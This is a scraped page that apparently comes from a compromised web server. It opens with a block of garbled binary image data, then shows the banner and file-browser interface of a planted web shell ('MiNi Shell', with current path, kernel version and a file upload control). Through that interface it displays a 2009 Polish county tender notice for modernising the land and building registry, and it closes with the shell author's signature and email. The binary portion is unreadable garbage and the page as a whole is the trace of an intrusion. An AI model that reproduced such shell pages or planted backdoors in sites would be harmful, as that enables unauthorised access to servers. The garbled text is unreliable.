JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/59651-N-2009.html

<p class="kh_header"><b>Puck: Wykonanie modernizacji ewidencji gruntów i budynków</b><br>
<b>Numer ogłoszenia: 59651 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Puck , ul. Orzeszkowej 5, 84-100 Puck, woj. pomorskie, tel. 058 6734202, faks 058 6734191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.starostwo.puck.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie modernizacji ewidencji gruntów i budynków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje realizację następujących zadań: 

1.	Zadanie-1
Wykonanie modernizacji ewidencji gruntów i budynków z założeniem rejestru lokali polegającej na  uzupełnieniu bazy danych ewidencji gruntów i budynków w zakresie lokali stanowiących odrębne nieruchomości,  kontrolę i zaktualizowanie budynków na podstawie map zasadniczych wraz z wykorzystaniem opracowań LPIS oraz wyłożenie projektu założenia ewidencji gruntów i budynków, a także modernizacja mapy zasadniczej polegająca na sporządzeniu numerycznego opracowania mapy zasadniczej wraz z nakładką ZUD.  

2.	Zadanie-2
Uzupełnienie i aktualizację komputerowej bazy danych powiatu puckiego prowadzonej w systemie EWID 2007 danymi geometrycznymi, opisowymi i rastrowymi zebranymi w wyniku wykonania Zadania-1 

3.	Zadanie-3
Aktualizację repliki komputerowej bazy danych powiatu puckiego udostępnianej w sieci internetowej przez oprogramowanie serwerowe WebEWID danymi geometrycznymi,  opisowymi i rastrowymi zebranymi w wyniku wykonania Zadania-1 w zakresie koniecznym do obsługi wykonawców prac geodezyjnych wraz z opracowaniem powtarzalnej technologii przedmiotowej aktualizacji.Ze względu na specyfikę przedmiotu zamówienia zamawiający zastrzega wykonanie całości zamówienia przez Wykonawcę (część lub całość zamówienia nie może być powierzona podwykonawcom).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 72.31.21.00-6, 72.31.20.00-5, 72.22.23.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium.
2.	Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 10.000,00 zł, słownie: dziesięć tysięcy złotych zero groszy.
3.	Wykonawca wnosi wadium:
1)	w pieniądzu, 
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym, 
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych,
5)	 w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z p. zm.) 
Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy nr: 51834800030000000003320004 w BS Puck, najpóźniej na dzień przed terminem otwarcia ofert, a za termin wniesienia przyjmuje się datę uznania na rachunku bankowym Zamawiającego.
Wadium wnoszone w formie innej niż pieniądze powinno być złożone razem z ofertą<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
(udokumentują to poprzez złożenie dokumentów potwierdzających posiadanie uprawnień do wykonywania działalności związanej z przedmiotem niniejszego zamówienia), 
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia: 
1)	udokumentują wykonanie z należytą starannością:
a)	przynajmniej 1 usługi polegającej na wykonaniu modernizacji ewidencji gruntów i budynków i numerycznej  mapy zasadniczej dla przynajmniej jednego obrębu ewidencyjnego,
b)	przynajmniej 1 usługi polegającej na aktualizacji komputerowej bazy danych jakiegokolwiek powiatu prowadzonej w systemie EWID 2007 danymi pochodzącymi z modernizacji ewidencji gruntów i budynków i numerycznej  mapy zasadniczej,
c)	przynajmniej 1 usługi polegającej na aktualizacji repliki komputerowej bazy danych jakiegokolwiek powiatu udostępnianej w sieci internetowej przez oprogramowanie serwerowe WebEWID.

2)	wykażą, iż dysponują przynajmniej 3 stanowiskami specjalistycznymi niezbędnymi do wykonania przedmiotu zamówienia wraz z licencyjnym oprogramowaniem tj.: komputerami klasy PC wyposażonymi w oprogramowanie aplikacyjne TurboEWID wersja 7.5 lub inne równoważne oprogramowanie, 

Za oprogramowanie równoważne uznaje się takie oprogramowanie, które umożliwia wprowadzanie zmian do bazy danych systemu EWID2007 w taki sposób, aby wynik wprowadzenia w/w zmian był identyczny z wynikiem wprowadzania zmian przez oprogramowanie TurboEWID wersja 7.5.  Zamawiający zastrzega sobie prawo dokonania testów równoważności oprogramowania posiadanego przez Wykonawcę przed ogłoszeniem wyników przetargu. 

Uwaga: podana nazwa oprogramowania TurboEWID nie narusza przepisów ustawy Prawo zamówień publicznych, gdyż jego wskazanie uzasadnione jest posiadaniem przez Zamawiającego wdrożonego zintegrowanego systemu EWID 2007 do obsługi Wydziału Geodezji w tym obsługi Ewidencji Gruntów, Budynków i Lokali oraz mapy zasadniczej, którego częścią jest oprogramowanie TurboEWID. Mając na uwadze powyższe zachodzi konieczność zachowania norm, parametrów i standardów jakimi charakteryzuje się przedmiotowy system. 

3)	dysponują osobami posiadającymi wymagane uprawnienia, kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia, tj.:
a)	dysponują minimum 3 osobami posiadającymi doświadczenie w pracach obejmujących wprowadzanie danych ewidencji gruntów i budynków oraz mapy zasadniczej do bazy danych systemu EWID2007 za pomocą oprogramowania TurboEWID lub innego równoważnego oprogramowania, 
b)	dysponują minimum jedną osobą posiadającą uprawnienia zawodowe w dziedzinie geodezji i kartografii w zakresie 1, 2.

3.     Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
(udokumentują to poprzez złożenie dokumentów potwierdzających posiadanie Polisy a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności),
4.    Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń. Wykonawca niespełniający warunków udziału w postępowaniu zostanie wykluczony zgodnie z art. 24 ust. 1-2 ustawy PZP.  Oferta Wykonawcy wykluczonego uznana zostanie za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty i załączniki: 1. Wypełniony i podpisany Formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1 do SIWZ,
2.	Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 i art. 24 ust. 1 i 2 Prawa zamówień publicznych z wykorzystaniem wzoru - załącznik nr 2 do SIWZ,
3.	Parafowany przez Wykonawcę Wzór umowy z wykorzystaniem załącznika nr 3 do SIWZ.
W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia oraz nie podlega wykluczeniu, do oferty należy dołączyć następujące dokumenty: 
1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.  

W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty: 
1.	Wykaz co najmniej 1 usługi wykonanej w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), odpowiadającej swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia (o której mowa w pkt 8.1; ppkt 2;1);a,) SIWZ z podaniem jej wartości, daty i miejsca wykonania (propozycję wykazu zawarto w załączniku nr 4 do SIWZ) oraz załączeniem dokumentów potwierdzających przez zleceniodawcę, ze roboty te zostały wykonane należycie. Usługa musi być wykonana na kwotę co najmniej: 350 tys. PLN brutto.
2.	Wykaz co najmniej 1 usługi wykonanej w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), odpowiadającej swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia (o której mowa w pkt 8.1; ppkt 2;1);b,) SIWZ z podaniem jej wartości, daty i miejsca wykonania (propozycję wykazu zawarto w załączniku nr 4 do SIWZ) oraz załączeniem dokumentów potwierdzających przez zleceniodawcę, ze roboty te zostały wykonane należycie. Usługa musi być wykonana na kwotę co najmniej: 100 tys. PLN brutto.
3.	Wykaz co najmniej 1 usługi wykonanej w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), odpowiadającej swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia (o której mowa w pkt 8.1; ppkt 2;1);c,) SIWZ z podaniem jej wartości, daty i miejsca wykonania (propozycję wykazu zawarto w załączniku nr 4 do SIWZ) oraz załączeniem dokumentów potwierdzających przez zleceniodawcę, ze roboty te zostały wykonane należycie. Usługa musi być wykonana na kwotę co najmniej: 50 tys. PLN brutto.
4.	Informację o znajdującym się w dyspozycji Wykonawcy sprzęcie wymaganym dla realizacji przedmiotu zamówienia, na druku zgodnym z treścią formularza - załącznika nr 5 do SIWZ. Informacja musi potwierdzać spełnienie warunku, o którym mowa w pkt 8.1; ppkt 2;2); SIWZ
5.	Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnego do wykonania zamówienia sprzętu, jeżeli w załączniku nr 5 do SIWZ Wykonawca wskazał sprzęt, którym będzie dysponował.
6.	Informację o osobach, które będą uczestniczyć w wykonywaniu zamówienia zgodnie z warunkami określonymi w w pkt 8.1; ppkt 2;3); SIWZ na druku zgodnym z treścią formularza - załącznika nr 6 do SIWZ. 
Do informacji złożonej na w/w formularzu Wykonawca winien dołączyć dokumenty zawierające dane na temat kwalifikacji i doświadczenia osób wskazanych do realizacji zamówienia potwierdzające posiadanie wymaganych uprawnień zawodowych w dziedzinie geodezji i kartografii tj.:  
a)	poświadczone kserokopie uprawnień zawodowych,
b)	poświadczone kserokopie certyfikatów operatorów oprogramowania TurboEWID v. 7.5 lub oprogramowania równoważnego.
7.	Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w załączniku nr 6 do SIWZ Wykonawca wskazał osoby, którymi będzie dysponował.

W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Wykonawca zobowiązany jest przedłożyć następujące dokumenty:
1.	Polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 200 tys. PLN.
Polisa a w przypadku jej braku inny dokument musi obejmować okres nie krótszy niż termin realizacji zadania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.starostwo.puck.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Pucku, ul. Orzeszkowej 5, 84-100 Puck.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Pucku, ul. Orzeszkowej 5, 84-100 Puck, Sekretariat - I piętro budynku.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com